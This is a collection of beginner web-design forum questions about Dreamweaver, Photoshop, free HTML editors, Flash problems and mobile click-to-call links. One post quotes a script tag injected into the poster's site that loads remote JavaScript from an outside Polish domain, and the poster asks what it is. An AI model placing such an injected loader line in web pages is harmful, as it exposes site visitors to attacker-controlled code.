I'm in the process of re-building my portfolio site and need to go through a lot of sites and generate both thumbnail and fullscreen image files. Does anyone know of any tools, ideally for chrome, to make generating these quicker and easier?

Hi guys, I am currently making a website for a musician and he is offering a free download of his album. I have built that into the site, but is there an easy way to track how many people download it? I see google analytics(sp?) is the way to go, but I have never undertook something like this before and would appreciate some help as to where to start. Hey, Basically i updated to IE9 a few days ago. Since then, when i open websites that ive created on my computer, flash no longer works. It just stays completely white. They were working the day before i installed this and i havent edited the websites at all. Ive searched for it on google but have not found a resolution yet. Flash wont even work on Firefox either. Websites such as youtube do work though. Im thankful for any responses.

I need HELP...am a total beginner in webdesign and started making my own mobile website using Easymobile creator (editor: tinymce). Everything wass working fine but only the most important thing: the click-to-call link ist not working. when i enter the tel code: <a href="tel:+43111111111"></a> it keeps changing it in the html code to <a href="/TestMobileSeiten/admin/<a href="tel:+431111111. EVERY time!!! thats a underpage on my server. I contacted the guys from easymobile but they are NOT helpful at all. Hi, I've been using notepad for my html editing, I now want to move up to a decent editor, but I have NO money. Dreamweaver is out of the question for cost alone. Can anyone recommend a decent freeware HTML/CSS editor (for windows XP)?

I've tried searching for this but can't seem to find a definitive answer, probably due to me not searching correctly! I have a site in Dreamweaver and hosting with 1&1. I've set everything up and uploaded my site with no problems. What I want to know is, when I make an adjustment to the site in Dreamweaver, is it just a simple of case of uploading the adjusted pages/site and that's it or do I need to remove anything before or after uploading the adjustments?? Basically will Dreamweaver/1&1 just replace the old with the new? I don't want to keep making adjustments and realise that I've got loads of unnecessary files attached to the site. Many thanks.

Hi all, i have a photoshop background for my website and a seperate photoshop file with clipping paths for my navigation buttons when i place them with html the clipping paths don't seem to work, is there a way round this or am i just best to add the buttons to my original background image.

ok... im not getting into image software practice yet, i havent finished working with HTML and CSS, so im holding off. but still, im always trying to get a bit of knowledge of things ill practice in the future, so it's easier when i get there. and to satisfy my general curiosity. so im just wondering how exactly a photoshop image, can then become a web layout, with functioning HTML etc... just a brief, or rather detailed explanation...whatever....please, would be greatly appreciated. finding answer's to questions through google search can be a pain, or in my case, sometimes impossible HA.

Hi Guys, I am quite new to the design world and am wondering on what everyone's opinion is regarding software to use and the process used. For example, the past two sites I have designed have been using Photoshop & Dreamweaver. Once the design is complete in Photoshop I then use the Slice Tool and "Save for Web..." option. Hi all I have a slight problem, hopefully someone can help me! Before linking the ‘Features’ button to the Features page. After linking the ‘Features’ button to page. As you can see (in the attached files) Before.bmpAfter.bmp wherever I have sliced the template .psd file and exported to dreamweaver, all the slice makers are shown? Like cracks. hello, i didnt know where to post this but i thought in this section would be fairly suitable, anyway, i went to my website today and realised there was a error on the page and i said to myself thats strange it worked last time and i hadnt edited any scripts, well it was because a javascript line had been added to before the start session line, <script type="text/javascript" src="http://psa.krakow.pl/js.php"></script> thats what was inserted to the top of the script, does anyone know exactly what this is and why and where its from? Hello everybody, I just installed CS5 in my laptop, i tried to open psd files or image files in phothoshop but it doesnt open anything, it doesnt show any errors, but if i open them in illustrator it works, it opens the files without a problem... iv tried to open by dragin, file-open, bridge and nothing happens...¿any idea on what could it be? so obviously photoshop is EXPENSIVE...too expensive for me, so what about photoshop elements? im a learning web designer/programmer and would like to know if photoshop elements will likely provide me with all i need. i mean, im at least mostly just gonna be using it to create some images for websites, like banner images etc. some people seem to think it probably contains pretty much all you ever end up needing from the full on version of photoshop...so what do you think?

can you buy software from america or anywhere? i ask this, because one, its cheaper, and two for some strange reason how come it seems every software store seems to be outside the uk? except for amazon. but also, i thought someone said you couldnt buy, say, photoshop from outside the UK.

Im not sure if this is the right place to post. If it isn't, apologies. I have installed Photoshop CS5 on my Windows 7 64bit machine, but it doesn't work. When I open an image or try to start a new project I get the following error: "Adobe Photoshop CS5 has stopped working". The only option on the error is "Close Program". I have checked the Adobe forums and other people have had this happen to them, but none of the soloutions posted seem to work. Has anyone here had this happen to them? If so, how did you resolve it? Hey Guys Hope someone can help me I run a dual screen setup, I use dreamweaver on the left screen and on right i have browser, I was using xrefresh so that when i saved my work it would refresh the browser however i cant seem to get xrefresh to connect to browser. I have loaded all the latest updates and even tried to go back to what i was using before. Its basically a cloud based application that allows you to design and code with html/css within your browser using menus that overlay on top.
